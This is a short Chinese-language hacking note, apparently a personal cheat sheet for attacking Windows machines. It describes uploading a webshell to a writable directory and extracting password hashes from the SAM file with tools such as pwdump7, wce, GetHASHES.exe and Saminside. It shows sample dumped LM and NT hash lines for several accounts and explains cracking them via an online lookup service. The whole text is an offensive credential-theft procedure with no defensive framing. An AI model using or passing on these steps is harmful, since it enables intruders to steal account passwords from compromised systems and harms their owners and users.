webshell 找能执行权限的目录上传

C:\Windows\System32\config\sam 内有windows 密码 利用工具把密码抓出来

samcopy 直接抓取

GetHASHES.exe $Local 返回当前系统所有的用户的哈希

pwdump7.exe 自动抓取哈希 都是用cmd 执行 来宾和system 一般都没有密码

wce.exe 自动抓哈希

Saminside 字典破解

破解sam密码 

我一般用pwdump7 执行后返回

Administrator:500:7B59ACC609CD473AF50785CA52198E4D:92748A4523592194AF8963A1949FCA0B:::

Guest:501:64C3E77603C7A3BF5A5E17C210A88A96:30CFBECB0A6FD6BADBAB21A275788798:::

:503:4F07A12B796A954B583F6D0501D59953:A0D5FADC55DA895E937A93ED39669D76:::

:504:9D8835529B6E728C4CEE482ECCDDD9CE:0A51EEE494AB8F940DB69BC2FCA4E648:::

test:1001:F5942A1378FEC39E6ACBF03ADAEE3EB1:8DFE55D2D16AA9E2DA4F44412E897201:::

密码格式为

nt-hash 直接丢到cmd5里解密 可以得到密码